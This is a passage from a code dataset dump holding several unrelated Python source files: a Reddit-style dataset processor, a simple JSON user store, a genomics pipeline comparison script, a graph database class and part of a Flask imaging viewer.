num_threads_delta)\n\nprint('Average comments total:', sum(1 for sample in dataset if sample['level'] is not None) / num_threads)\nprint('Average comments lvl0:', sum(1 for sample in dataset_lvl0 if sample['level'] == 0) / num_threads)\nprint('Average comments total delta:', sum(1 for sample in dataset_delta if sample['level'] is not None) / num_threads_delta)\nprint('Average comments lvl0 delta:', sum(1 for sample in dataset_delta_lvl0 if sample['level'] == 0) / num_threads_delta)\n\n\nauthors_threads_dict = defaultdict(int)\nfor sample in dataset:\n if sample['level'] is None:\n authors_threads_dict[sample['author']] += 1\nprint('Num authors:', len(authors_threads_dict.keys()))\nprint('Average num author threads:', np.mean(list(authors_threads_dict.values())))\n\ndelta_authors_threads_dict = defaultdict(int)\nfor sample in dataset_delta:\n if sample['level'] is None:\n delta_authors_threads_dict[sample['author']] += 1\nprint('Num authors delta:', len(delta_authors_threads_dict.keys()))\nprint('Average num author threads delta:', np.mean(list(delta_authors_threads_dict.values())))\n\n\n# Save\nwith open(script_folder / 'dataset_full.jsonl', 'w') as f:\n for sample in tqdm(dataset, desc='Save dataset (full)'):\n json.dump(sample, f)\n f.write('\\n')\n\nwith open(script_folder / 'dataset_lvl0.jsonl', 'w') as f:\n for sample in tqdm(dataset_lvl0, desc='Save dataset (lvl0)'):\n json.dump(sample, f)\n f.write('\\n')\n\nwith open(script_folder / 'dataset_full_delta.jsonl', 'w') as f:\n for sample in tqdm(dataset_delta, desc='Save dataset (full \\w delta)'):\n json.dump(sample, f)\n f.write('\\n')\n\nwith open(script_folder / 'dataset_lvl0_delta.jsonl', 'w') as f:\n for sample in tqdm(dataset_delta_lvl0, desc='Save dataset (lvl0 \\w delta)'):\n json.dump(sample, f)\n f.write('\\n')\n","repo_name":"lct-rug-2022/language-tech-project","sub_path":"discussion-task/data/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":5094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"35438700852","text":"import json\n\nusers = []\n\ndef deleteUserFromDb(userJson):\n users = readDb()\n users.remove(userJson)\n writeDb(users)\n\ndef addUserToDb(user):\n userDict = {\n \"userno\":user.get_user_no(),\n \"name\": user.get_name(),\n \"surname\": user.get_surname(),\n \"age\": user.get_age(),\n \"username\": user.get_username(),\n \"password\": user.get_password()\n }\n users.append(userDict)\n writeDb(users)\n\ndef readDb():\n with open(\"database.json\", \"r\", encoding=\"utf-8\") as file:\n if bool(file.read()):\n file.seek(0)\n users = json.load(file)\n else:\n users = []\n return users\n\ndef writeDb(users):\n with open(\"database.json\", \"w\", encoding=\"utf-8\") as file:\n json.dump(users, file)","repo_name":"sahilappayev/RegistrationSystem","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"39080995918","text":"\"\"\"\ncompares a Seqr file against results of a previous AIP run\n\nThe Seqr file is a TSV of all variants flagged as interesting\nThis is designed to recognise flags in the format 'AIP training: Confidence'\n\nSee relevant documentation for a description of the algorithm used\n\"\"\"\n# mypy: ignore-errors\nimport json\nimport os\nfrom collections import defaultdict\nfrom csv import DictReader\nfrom enum import Enum\nimport logging\nimport re\nimport sys\nfrom typing import Any\n\nfrom argparse import ArgumentParser\nfrom cloudpathlib import AnyPath\nfrom cyvcf2 import VCFReader\nimport hail as hl\nfrom peddy import Ped\n\nfrom cpg_utils.config import get_config\nfrom cpg_utils.hail_batch import init_batch\n\nfrom reanalysis.hail_filter_and_label import (\n extract_annotations,\n filter_matrix_by_ac,\n filter_on_quality_flags,\n filter_to_population_rare,\n filter_to_well_normalised,\n green_and_new_from_panelapp,\n CONFLICTING,\n LOFTEE_HC,\n PATHOGENIC,\n)\n\nfrom reanalysis.utils import read_json_from_path, canonical_contigs_from_vcf\n\nSAMPLE_NUM_RE = re.compile(r'sample_[0-9]+')\nSAMPLE_ALT_TEMPLATE = 'num_alt_alleles_{}'\nVALID_VALUES = [\n 'AIP training: Expected',\n 'AIP training: Possible',\n 'AIP training: Unlikely',\n]\n\n\nclass Confidence(Enum):\n \"\"\"\n enumeration for possible confidence values\n from AIP we get CERTAIN, as these are found\n from seqr dump, we use tags to determine confidence\n - where confidence means 'how confident are we that\n AIP should be capturing this result'\n \"\"\"\n\n EXPECTED = 'AIP training: Expected'\n POSSIBLE = 'AIP training: Possible'\n UNLIKELY = 'AIP training: Unlikely'\n\n def __lt__(self, other):\n return self.value < other.value\n\n\nclass CommonFormatResult:\n \"\"\"\n a common representation of variant details\n \"\"\"\n\n def __init__(\n self, chrom: str, pos: int, ref: str, alt: str, confidence: list[Confidence]\n ):\n \"\"\"\n always normalise contig - upper case, with no CHR prefix\n :param chrom:\n :param pos:\n :param ref:\n :param alt:\n :param confidence:\n \"\"\"\n self.chr: str = self.normalise_chrom(chrom)\n self.pos: int = pos\n self.ref: str = ref\n self.alt: str = alt\n self.confidence: list[Confidence] = confidence\n\n @staticmethod\n def normalise_chrom(chrom: str) -> str:\n \"\"\"\n normalise the string name\n :param chrom:\n :return:\n \"\"\"\n up_chrom = chrom.upper()\n chrom = up_chrom[up_chrom.startswith('CHR') and 3 :]\n return chrom\n\n def get_cyvcf2_pos(self, contigs: set[str]) -> tuple[str, str]:\n \"\"\"\n get variant coordinates in string format\n returns the coordinates for a cyvcf2 query, AND\n the contig name, normalised to the VCF\n :param contigs: all the contigs present in the VCF\n :return:\n \"\"\"\n if self.chr in contigs:\n string_chr = self.chr\n else:\n string_chr = f'chr{self.chr}'\n\n if string_chr not in contigs:\n raise ValueError(\n f'Contigs in this VCF not compatible with provided locus: {self}'\n )\n return string_chr, f'{string_chr}:{self.pos}-{self.pos}'\n\n def get_hail_pos(self) -> tuple[hl.Locus, list[str]]:\n \"\"\"\n get relevant values for finding a variant row within a MT\n :return:\n \"\"\"\n return hl.Locus(\n contig=f'chr{self.chr}', position=self.pos, reference_genome='GRCh38'\n ), [\n self.ref,\n self.alt,\n ]\n\n def __repr__(self):\n return (\n f'{self.chr}:{self.pos}_{self.ref}>{self.alt} '\n f'- {\", \".join(map(str, sorted(self.confidence)))}'\n )\n\n def __eq__(self, other):\n return (\n self.chr == other.chr\n and self.pos == other.pos\n and self.ref == other.ref\n and self.alt == other.alt\n )\n\n def __hash__(self):\n \"\"\"\n hash function\n :return:\n \"\"\"\n return hash(repr(self))\n\n\nCommonDict = dict[str, list[CommonFormatResult]]\nReasonDict = dict[str, list[tuple[CommonFormatResult, list[str]]]]\n\n\ndef common_format_aip(results_dict: dict[str, Any]) -> CommonDict:\n \"\"\"\n Parses the JSON\n\n :param results_dict:\n :return:\n \"\"\"\n sample_dict: CommonDict = defaultdict(list)\n\n # collect all per-sample results into a separate index\n for sample, variants in results_dict.items():\n\n for var in variants:\n coords = var['var_data']['coords']\n sample_dict[sample].append(\n CommonFormatResult(\n coords['chrom'],\n int(coords['pos']),\n coords['ref'],\n coords['alt'],\n [Confidence.EXPECTED],\n )\n )\n\n return sample_dict\n\n\ndef common_format_seqr(seqr: str, affected: list[str]) -> CommonDict:\n \"\"\"\n identify the most likely proband for each row, and create a variant object for them\n\n :param seqr:\n :param affected:\n :return:\n \"\"\"\n\n assert seqr.endswith('.tsv'), 'process requires a TSV format export'\n sample_dict: CommonDict = defaultdict(list)\n\n with AnyPath(seqr).open() as handle:\n seqr_parser = DictReader(handle, delimiter='\\t')\n\n # Each Sample ID is under a separate column heading, e.g. sample_1\n # this is instead of proband/mother/father; no mandatory family structure\n sample_cols = [\n sample_field\n for sample_field in seqr_parser.fieldnames\n if SAMPLE_NUM_RE.match(sample_field)\n ]\n\n for entry in seqr_parser:\n\n # get all valid tags\n tags = [\n Confidence(tag)\n for tag in entry['tags'].split('|')\n if tag in VALID_VALUES\n ]\n\n # no relevant tags, not interested...\n if len(tags) == 0:\n continue\n\n # create a variant object\n variant_obj = CommonFormatResult(\n entry['chrom'],\n int(entry['pos']),\n entry['ref'],\n entry['alt'],\n confidence=tags,\n )\n\n # seqr has no notion of 'proband', so add for each affected\n # see README for discussion\n for index, value in enumerate(sample_cols, 1):\n if (\n entry[value] in affected\n and int(entry[SAMPLE_ALT_TEMPLATE.format(index)]) > 0\n ):\n sample_dict[entry[value]].append(variant_obj)\n\n logging.info(f'Variants from Seqr digest: {sample_dict}')\n\n return sample_dict\n\n\ndef find_seqr_flags(aip_results: CommonDict, seqr_results: CommonDict) -> dict:\n \"\"\"\n check for exact matches to the Seqr flags, and report numbers\n returns a per-confidence dictionary of the variant details and counts\n Args:\n aip_results ():\n seqr_results ():\n\n Returns:\n\n \"\"\"\n\n flag_matches = {\n key: {\n 'matched': {'details': [], 'count': 0},\n 'unmatched': {'details': [], 'count': 0},\n }\n for key in ['EXPECTED', 'UNLIKELY', 'POSSIBLE']\n }\n total_seqr_variants = 0\n\n for sample, variants in seqr_results.items():\n if sample not in aip_results:\n for v in variants:\n for conf in v.confidence:\n flag_matches[conf.name]['unmatched']['details'].append(\n f'{sample}::{repr(v)}'\n )\n flag_matches[conf.name]['unmatched']['count'] += 1\n total_seqr_variants += 1\n continue\n\n aip_variants = aip_results[sample]\n for v in variants:\n total_seqr_variants += 1\n match = 'matched' if v in aip_variants else 'unmatched'\n for conf in v.confidence:\n flag_matches[conf.name][match]['details'].append(f'{sample}::{repr(v)}')\n flag_matches[conf.name][match]['count'] += 1\n\n # print a summary into logging\n logging.info(f'Total Seqr Variants: {total_seqr_variants}')\n for confidence, match_types in flag_matches.items():\n logging.info(f'{confidence}')\n for match_type, match_dict in match_types.items():\n logging.info(f'\\t{match_type} - {match_dict[\"count\"]}')\n\n return flag_matches\n\n\ndef find_missing(aip_results: CommonDict, seqr_results: CommonDict) -> CommonDict:\n \"\"\"\n 1 way comparison - find all results present in Seqr, and missing from AIP\n This is a check for False Negatives\n :param aip_results:\n :param seqr_results:\n :return:\n \"\"\"\n discrepancies: CommonDict = defaultdict(list)\n\n # get all common samples between the two data sets\n seqr_samples = set(seqr_results.keys())\n aip_samples = set(aip_results.keys())\n\n common_samples = aip_samples.intersection(seqr_samples)\n\n missing_samples = seqr_samples - common_samples\n if len(missing_samples) > 0:\n logging.error(\n f'Samples completely missing from AIP results: '\n f'{\", \".join(missing_samples)}'\n )\n\n # for each of those missing samples, add all variants\n for miss_sample in missing_samples:\n discrepancies[miss_sample] = seqr_results[miss_sample]\n logging.error(\n f'Sample {miss_sample}: '\n f'{len(seqr_results[miss_sample])} missing variant(s)'\n )\n\n for sample in common_samples:\n\n # only finds discrepancies, not Matched results - revise\n sample_discrepancies = [\n variant\n for variant in seqr_results[sample]\n if variant not in aip_results[sample]\n ]\n\n # only populate the index if missing variants found\n if sample_discrepancies:\n discrepancies[sample] = sample_discrepancies\n\n # log the number of matches\n matched = len(\n [\n variant\n for variant in seqr_results[sample]\n if variant in aip_results[sample]\n ]\n )\n\n logging.info(f'Sample {sample} - {matched} matched variant(s)')\n logging.info(\n f'Sample {sample} - {len(sample_discrepancies)} missing variant(s)'\n )\n\n return discrepancies\n\n\ndef find_affected_samples(pedigree: Ped) -> list[str]:\n \"\"\"\n finds all affected members of the provided pedigree\n\n :param pedigree:\n :return:\n \"\"\"\n return [sam.sample_id for sam in pedigree.samples() if sam.affected]\n\n\ndef check_in_vcf(vcf_path: str, variants: CommonDict) -> tuple[CommonDict, CommonDict]:\n \"\"\"\n check whether each variant is present within the labelled VCF\n split list of discrepancies into two collections;\n - in VCF (investigate via MOI)\n - not in VCF (investigate within MT)\n\n Args:\n vcf_path ():\n variants ():\n\n Returns:\n\n \"\"\"\n\n in_vcf: CommonDict = defaultdict(list)\n not_in_vcf: CommonDict = defaultdict(list)\n\n # open the VCF for reading (VCF needs to be localised in hail)\n vcf_handler = VCFReader(vcf_path)\n vcf_contigs = canonical_contigs_from_vcf(vcf_handler)\n\n # iterate over all samples, and corresponding lists\n for sample, var_list in variants.items():\n for var in var_list:\n\n # assume missing until confirmed otherwise\n found = False\n normalised_chrom, coordinates = var.get_cyvcf2_pos(vcf_contigs)\n for vcf_var in vcf_handler(coordinates):\n\n # check position and alleles\n if (\n vcf_var.CHROM == normalised_chrom\n and vcf_var.POS == var.pos\n and vcf_var.REF == var.ref\n and vcf_var.ALT[0] == var.alt\n ):\n found = True\n in_vcf[sample].append(var)\n break\n if not found:\n not_in_vcf[sample].append(var)\n\n return in_vcf, not_in_vcf\n\n\ndef find_variant_in_mt(\n matrix: hl.MatrixTable, var: CommonFormatResult\n) -> hl.MatrixTable:\n \"\"\"\n :param matrix:\n :param var:\n :return:\n \"\"\"\n var_locus, var_alleles = var.get_hail_pos()\n logging.info(f'Querying for {var_locus}: {var_alleles}')\n return matrix.filter_rows(\n (matrix.locus == var_locus) & (matrix.alleles == var_alleles)\n )\n\n\ndef check_gene_is_green(\n matrix: hl.MatrixTable, green_genes: hl.SetExpression\n) -> hl.MatrixTable:\n \"\"\"\n :param matrix:\n :param green_genes:\n :return:\n \"\"\"\n return matrix.filter_rows(green_genes.contains(matrix.geneIds))\n\n\ndef run_ac_check(matrix: hl.MatrixTable) -> list[str]:\n \"\"\"\n if there are enough samples in the joint call, run the AC test\n :param matrix:\n :return:\n \"\"\"\n if (\n filter_matrix_by_ac(matrix, get_config()['filter']['ac_threshold']).count_rows()\n == 0\n ):\n return ['QC: AC too high in joint call']\n return []\n\n\ndef run_quality_flag_check(matrix: hl.MatrixTable) -> list[str]:\n \"\"\"\n check the variant wasn't flagged by the caller/VQSR\n :param matrix:\n :return:\n \"\"\"\n if filter_on_quality_flags(matrix).count_rows() == 0:\n return ['QC: Variant has assigned quality flags']\n return []\n\n\ndef check_variant_was_normalised(matrix: hl.MatrixTable) -> list[str]:\n \"\"\"\n checks the variant is normalised\n :param matrix:\n :return:\n \"\"\"\n\n if filter_to_well_normalised(matrix).count_rows() == 0:\n return ['QC: Variant not well normalised']\n return []\n\n\ndef check_population_rare(matrix: hl.MatrixTable) -> tuple[hl.MatrixTable, list[str]]:\n \"\"\"\n filter out all rare variants, return fail reason if everything is removed\n :param matrix:\n :return:\n \"\"\"\n matrix = filter_to_population_rare(matrix)\n\n if matrix.count_rows() == 0:\n return matrix, ['AF: No variants remain after Rare filter']\n return matrix, []\n\n\ndef check_cat_1(matrix: hl.MatrixTable) -> list[str]:\n \"\"\"\n test against all conditions of category 1\n pretty primitive approach - apply a filter, count the rows...\n :param matrix:\n :return:\n \"\"\"\n reasons = []\n if matrix.filter_rows(matrix.info.clinvar_stars > 0).count_rows() == 0:\n reasons.append('C1: ClinVar stars 0 or missing')\n if (\n matrix.filter_rows(\n matrix.info.clinvar_sig.lower().contains(PATHOGENIC)\n ).count_rows()\n == 0\n ):\n reasons.append('C1: Not ClinVar Pathogenic')\n if (\n matrix.filter_rows(\n matrix.info.clinvar_sig.lower().contains(CONFLICTING)\n ).count_rows()\n > 0\n ):\n reasons.append('C1: ClinVar rating Conflicting')\n return reasons\n\n\ndef filter_csq_to_set(matrix: hl.MatrixTable) -> hl.MatrixTable:\n \"\"\"\n overwrite the transcript consequences by only retaining those which\n have a consequence term overlapping with the supplied set\n :param matrix:\n :return:\n \"\"\"\n critical_consequences = hl.set(get_config()['filter']['critical_csq'])\n\n # consequence_terms is an array - cast as a set\n csq_mt = matrix.annotate_rows(\n vep=matrix.vep.annotate(\n transcript_consequences=matrix.vep.transcript_consequences.filter(\n lambda x: hl.len(\n critical_consequences.intersection(hl.set(x.consequence_terms))\n )\n > 0\n )\n )\n )\n\n # return rows which have remaining consequences\n return csq_mt.filter_rows(hl.len(csq_mt.vep.transcript_consequences) > 0)\n\n\ndef check_cadd_revel(matrix: hl.MatrixTable) -> int:\n \"\"\"\n :param matrix:\n :return:\n \"\"\"\n\n return matrix.filter_rows(\n (matrix.info.cadd > get_config()['filter']['in_silico']['cadd'])\n | (matrix.info.revel > get_config()['filter']['in_silico']['revel'])\n ).count_rows()\n\n\ndef check_cat_2(matrix: hl.MatrixTable, new_genes: hl.SetExpression) -> list[str]:\n \"\"\"\n test against all conditions of category 2\n :param matrix:\n :param new_genes:\n :return:\n \"\"\"\n reasons = []\n if matrix.filter_rows(new_genes.contains(matrix.geneIds)).count_rows() == 0:\n reasons.append('C2: Gene was not New in PanelApp')\n\n # filter to high CSQ, so count_rows shows whether there were rows left\n csq_filtered = filter_csq_to_set(matrix=matrix)\n if not csq_filtered.count_rows():\n reasons.append('C2: No HIGH CSQs')\n\n # stop here, nothing left to search\n return reasons\n\n if (\n matrix.filter_rows(\n matrix.info.clinvar_sig.lower().contains(PATHOGENIC)\n ).count_rows()\n == 0\n ):\n reasons.append('C2: Not ClinVar Pathogenic')\n\n if check_cadd_revel(matrix) == 0:\n reasons.append('C2: CADD & REVEL not significant')\n\n return reasons\n\n\ndef check_cat_3(matrix: hl.MatrixTable) -> list[str]:\n \"\"\"\n test against all conditions of category 3\n :param matrix:\n :return:\n \"\"\"\n reasons: list[str] = []\n\n # row-dependent annotation check\n if (\n matrix.filter_rows(\n matrix.info.clinvar_sig.lower().contains(PATHOGENIC)\n ).count_rows()\n == 0\n ):\n reasons.append('C3: No ClinVar Pathogenic')\n\n csq_filtered = filter_csq_to_set(matrix=matrix)\n # if there are no high consequences, no more rows to test; continue\n if not csq_filtered.count_rows():\n reasons.append('C3: No HIGH CSQs')\n return reasons\n\n # further filter to rows which aren't ruled out by LOFTEE\n if (\n csq_filtered.filter_rows(\n csq_filtered.vep.transcript_consequences.any(\n lambda x: (x.lof == LOFTEE_HC) | (hl.is_missing(x.lof))\n )\n ).count_rows()\n == 0\n ):\n reasons.append('C3: No LOFTEE High Confidence')\n\n return reasons\n\n\ndef check_cat_support(matrix: hl.MatrixTable) -> list[str]:\n \"\"\"\n test against all conditions of support category\n :param matrix:\n :return:\n \"\"\"\n reasons: list[str] = []\n\n if check_cadd_revel(matrix) == 0:\n reasons.append('Support: CADD & REVEL not significant')\n if (\n matrix.filter_rows(\n matrix.vep.transcript_consequences.any(\n lambda x: x.sift_score <= get_config()['filter']['in_silico']['sift']\n )\n ).count_rows()\n == 0\n ):\n reasons.append('Support: SIFT not significant')\n\n if (\n matrix.filter_rows(\n matrix.vep.transcript_consequences.any(\n lambda x: x.polyphen_score\n >= get_config()['filter']['in_silico']['polyphen']\n )\n ).count_rows()\n == 0\n ):\n reasons.append('Support: PolyPhen not significant')\n if (\n matrix.filter_rows(\n (matrix.info.mutationtaster.contains('D'))\n | (matrix.info.mutationtaster == 'missing')\n ).count_rows()\n == 0\n ):\n reasons.append('Support: No significant MutationTaster')\n\n return reasons\n\n\ndef prepare_mt(matrix: hl.MatrixTable) -> hl.MatrixTable:\n \"\"\"\n prepare the MT (splitting by gene, moving attributes, etc.)\n replicates split_rows_by_gene_and_filter_to_green\n :param matrix:\n :return:\n \"\"\"\n\n # split out the different gene annotations onto separate rows\n # but don't remove non-green genes yet\n matrix = matrix.explode_rows(matrix.geneIds)\n\n # csq filter to single gene per row\n matrix = matrix.annotate_rows(\n vep=matrix.vep.annotate(\n transcript_consequences=matrix.vep.transcript_consequences.filter(\n lambda x: (matrix.geneIds == x.gene_id)\n & ((x.biotype == 'protein_coding') | (x.mane_select.contains('NM')))\n )\n )\n )\n\n # move annotations, use original method\n return extract_annotations(matrix)\n\n\ndef check_mt(\n matrix: hl.MatrixTable,\n variants: CommonDict,\n green_genes: hl.SetExpression,\n new_genes: hl.SetExpression,\n) -> tuple[CommonDict, ReasonDict]:\n \"\"\"\n for all variants provided, check which are present in the matrix table\n export two lists; not in the MT, and in the MT\n\n There's currently a fair bit of repetition here, simplify\n\n :param matrix:\n :param variants:\n :param green_genes:\n :param new_genes:\n :return:\n \"\"\"\n\n not_in_mt: CommonDict = defaultdict(list)\n untiered: ReasonDict = defaultdict(list)\n\n for sample, variant in [\n (sam, var) for (sam, var_list) in variants.items() for var in var_list\n ]:\n logging.info(f'running check for {sample}, variant {variant}')\n\n # filter the MT to the required locus\n var_mt = find_variant_in_mt(matrix=matrix, var=variant)\n\n # check if there are remaining variant rows\n if not var_mt.count_rows():\n not_in_mt[sample].append(variant)\n continue\n\n # shift attributes in the MT, and explode on gene ID\n var_mt = prepare_mt(var_mt)\n\n # check for any failure reasons in the QC tests\n reasons: list[str] = []\n\n # run all methods relating to the quality of the variant call\n reasons.extend(run_ac_check(var_mt))\n reasons.extend(run_quality_flag_check(var_mt))\n reasons.extend(check_variant_was_normalised(var_mt))\n # # not actually a reason for failing\n # reasons.extend(filter_sample_by_ab(var_mt, sample))\n var_mt = check_gene_is_green(matrix=var_mt, green_genes=green_genes)\n if not var_mt.count_rows():\n reasons.append('Gene is not GREEN in PanelApp')\n\n # break early if we find a QC/Green Gene failure\n if reasons:\n untiered[sample].append((variant, reasons))\n continue\n\n # remove common variants\n var_mt, af_reason = check_population_rare(var_mt)\n\n # break early if we find a CSQ failure?\n if af_reason:\n reasons.extend(af_reason)\n untiered[sample].append((variant, reasons))\n continue\n\n # pass through the classification methods\n reasons.extend(check_cat_1(matrix=var_mt))\n reasons.extend(check_cat_2(matrix=var_mt, new_genes=new_genes))\n reasons.extend(check_cat_3(matrix=var_mt))\n reasons.extend(check_cat_support(matrix=var_mt))\n\n # log all reasons, even if the list is empty\n untiered[sample].append((variant, reasons))\n\n if not reasons:\n logging.error(f'No Fail reasons for Sample {sample}, ' f'Variant {variant}')\n\n return not_in_mt, untiered\n\n\ndef main(results_folder: str, pedigree: str, seqr: str, vcf: str, mt: str, output: str):\n \"\"\"\n runs a full match-seeking analysis of this AIP run against the\n expected variants (based on seqr training flags)\n\n :param results_folder:\n :param pedigree:\n :param seqr:\n :param vcf:\n :param mt:\n :param output:\n :return:\n \"\"\"\n\n # normalise data formats from AIP result file\n aip_results = common_format_aip(\n results_dict=read_json_from_path(\n os.path.join(results_folder, 'summary_results.json')\n )\n )\n\n # Search for all affected sample IDs in the Peddy Pedigree\n affected = find_affected_samples(Ped(pedigree))\n\n # parse the Seqr results table, specifically targeting variants in probands\n seqr_results = common_format_seqr(seqr=seqr, affected=affected)\n\n # strict comparison\n flag_summary = find_seqr_flags(aip_results=aip_results, seqr_results=seqr_results)\n with AnyPath(f'{output}_match_summary.json').open('w') as handle:\n json.dump(flag_summary, handle, default=str, indent=4)\n\n # compare the results of the two datasets\n discrepancies = find_missing(seqr_results=seqr_results, aip_results=aip_results)\n if not discrepancies:\n logging.info('All variants resolved!')\n sys.exit(0)\n\n # load and digest panel data\n panel_dict = read_json_from_path(os.path.join(results_folder, 'panelapp_data.json'))\n green_genes, new_genes = green_and_new_from_panelapp(panel_dict)\n\n # if we had discrepancies, bin into classified and misc.\n in_vcf, not_in_vcf = check_in_vcf(vcf_path=vcf, variants=discrepancies)\n\n # some logging content here\n for sample in not_in_vcf:\n logging.info(f'Sample: {sample}')\n for variant in not_in_vcf[sample]:\n logging.info(f'\\tVariant {variant} missing from VCF')\n\n # some logging content here\n for sample in in_vcf:\n logging.info(f'Sample: {sample}')\n for variant in in_vcf[sample]:\n logging.info(f'\\tVariant {variant} requires MOI checking')\n\n # if there were any variants missing from the VCF, attempt to find them in the MT\n if len(not_in_vcf) == 0:\n sys.exit(0)\n\n # if we need to check the MT, start Hail Query\n init_batch(driver_cores=8, driver_memory='highmem')\n\n # read in the MT\n matrix = hl.read_matrix_table(mt)\n\n not_present, untiered = check_mt(\n matrix=matrix,\n variants=not_in_vcf,\n green_genes=green_genes,\n new_genes=new_genes,\n )\n if untiered:\n with AnyPath(f'{output}_untiered.json').open('w') as handle:\n json.dump(untiered, handle, default=str, indent=4)\n\n if not_present:\n with AnyPath(f'{output}_missing.json').open('w') as handle:\n json.dump(not_present, handle, default=str, indent=4)\n\n\nif __name__ == '__main__':\n logging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s %(levelname)s %(module)s:%(lineno)d - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n stream=sys.stderr,\n )\n parser = ArgumentParser()\n parser.add_argument('--results_folder')\n parser.add_argument('--pedigree')\n parser.add_argument('--seqr')\n parser.add_argument('--vcf')\n parser.add_argument('--mt')\n parser.add_argument('--output')\n args = parser.parse_args()\n main(\n results_folder=args.results_folder,\n pedigree=args.pedigree,\n seqr=args.seqr,\n vcf=args.vcf,\n mt=args.mt,\n output=args.output,\n )\n","repo_name":"populationgenomics/automated-interpretation-pipeline","sub_path":"comparison/comparison.py","file_name":"comparison.py","file_ext":"py","file_size_in_byte":26169,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"25488027794","text":"#coding: utf-8\n\nfrom bd_documento import BancoDocumentos\n\n\nclass BancoGrafo(BancoDocumentos):\n\n def __init__(self):\n super().__init__()\n self.arestas = {}\n self.contador_arestas = 0\n\n def criar_aresta(self, colecao_origem, indice_origem, colecao_destino, indice_destino, tipo, valor=None):\n # provoca KeyError para indices inexistentes e ValueError para colecoes inexistentes\n if self.recuperar(colecao_origem, indice_origem) and self.recuperar(colecao_destino, indice_destino):\n aresta_existente = [a[1] for a in self.arestas.items() if\n a[1]['colecao_origem'] == colecao_origem and a[1]['indice_origem'] == indice_origem and\n a[1]['colecao_destino'] == colecao_destino and a[1]['indice_destino'] == indice_destino and\n a[1]['tipo'] == tipo]\n if not aresta_existente:\n self.contador_arestas += 1\n novo_indice = self.contador_arestas\n self.arestas[novo_indice] = {\n 'colecao_origem':colecao_origem, 'indice_origem':indice_origem,\n 'colecao_destino':colecao_destino, 'indice_destino':indice_destino,\n 'tipo':tipo, 'valor':valor}\n return novo_indice\n else:\n raise ValueError('Aresta já existe.')\n\n def recuperar_aresta(self, indice):\n return self.arestas[indice] # deixa passar KeyError para indice inexistente\n\n def buscar_aresta(self, colecao_origem, indice_origem, colecao_destino, indice_destino, tipo):\n indice = None\n indices = [a[0] for a in self.arestas.items() if\n a[1]['colecao_origem'] == colecao_origem and a[1]['indice_origem'] == indice_origem and\n a[1]['colecao_destino'] == colecao_destino and a[1]['indice_destino'] == indice_destino and\n a[1]['tipo'] == tipo]\n if indices:\n indice = indices[0]\n return indice\n\n def alterar_aresta(self, indice, novo_valor):\n self.arestas[indice]['valor'] = novo_valor\n\n def excluir_aresta(self, indice):\n del self.arestas[indice]\n\n def buscar_vertices_destino(self, colecao, indice, tipo):\n return [(a[1]['colecao_destino'], a[1]['indice_destino']) for a in self.arestas.items() if\n a[1]['colecao_origem'] == colecao and\n a[1]['indice_origem'] == indice and\n a[1]['tipo'] == tipo]\n\n def buscar_vertices_origem(self, colecao, indice, tipo):\n return [(a[1]['colecao_origem'], a[1]['indice_origem']) for a in self.arestas.items() if\n a[1]['colecao_destino'] == colecao and\n a[1]['indice_destino'] == indice and\n a[1]['tipo'] == tipo]","repo_name":"luizclaudio/nosqlba-2018","sub_path":"bds_exemplo_python/grafo/bd_grafo.py","file_name":"bd_grafo.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"21067744478","text":"from app import app\n\nimport numpy as np\n\nimport os.path\nimport glob\ntry:\n import cPickle as pickle\nexcept:\n import pickle\nimport base64\nimport matplotlib\nimport matplotlib.cm\nimport re\nimport time\nimport numpy.ma as ma\nimport json\nfrom shapely.geometry.point import Point\nimport urllib\nfrom skimage import img_as_ubyte\n\nfrom flask import render_template\nfrom flask import request\nfrom flask import jsonify\n\nfrom sima import ImagingDataset\nfrom sima import Sequence\nfrom sima.ROI import ROIList\nfrom sima.ROI import ROI\nfrom sima.segment import SmoothROIBoundaries\n\nfrom PIL import Image\ntry:\n import StringIO\nexcept:\n import io as StringIO\n\nimport lab.classes.sima_sequences as sima_sequences\n\nimport app.frame_loader as frame_loader\n\ndef convertToBin(arr):\n min_val = np.min(arr)\n arr += min_val\n dat = arr.reshape((1, arr.shape[0]))\n\n img = Image.fromarray(dat.astype('uint8'), 'L')\n strBuffer = StringIO.StringIO()\n img.save(strBuffer, 'png')\n strBuffer.seek(0)\n\n imageString = \"data:image/png;base64,\"+base64.b64encode(strBuffer.read())\n\n return (imageString, min_val)\n\n\ndef convertToB64Jpeg(arr, quality=100):\n img = Image.fromarray(arr, 'L')\n img_io = StringIO.StringIO()\n img.save(img_io, 'jpeg', quality=quality)\n img_io.seek(0)\n\n return 'data:image/jpeg;base64,'+base64.b64encode(img_io.read())\n\n\ndef convertToColorB64Jpeg(arr, quality=100):\n img = Image.fromarray(arr, 'RGB')\n img.save('/home/jack/tmp/'+str(time.time())+'.png')\n img_io = StringIO.StringIO()\n img.save(img_io, 'jpeg', quality=quality)\n img_io.seek(0)\n\n return 'data:image/jpeg;base64,'+base64.b64encode(img_io.read())\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n ds = request.args.get('dataset')\n channel = request.args.get('channel')\n cycle = request.args.get('cycle')\n cutoff1 = request.args.get('cutoff1')\n cutoff2 = request.args.get('cutoff2')\n\n return render_template('index.html', dataset=ds, channel=channel,\n cycle=cycle, cutoff1=cutoff1, cutoff2=cutoff2)\n\n\n@app.route('/getInfo', methods=['GET', 'POST'])\ndef getInfo():\n ds_path = request.form.get('path')\n\n if (os.path.splitext(ds_path)[-1] == '.sima'):\n try:\n ds = ImagingDataset.load(ds_path)\n except IOError:\n return jsonify(error='dataset not found')\n\n seq = ds.sequences[0]\n else:\n try:\n seq = Sequence.create('HDF5', ds_path, 'tzyxc', key='imaging')\n except IOError:\n return jsonify(error='dataset not found')\n\n length = seq.shape[0]\n\n norming_vals = []\n for c in range(seq.shape[4]):\n norming_vals.append(np.array(\n list(map(lambda f: (np.nanpercentile(seq._get_frame(f)[..., c], 2),\n np.nanpercentile(seq._get_frame(f)[..., c], 98)),\n [0, length//2, -1]))))\n norming_vals = np.nanmean(norming_vals, 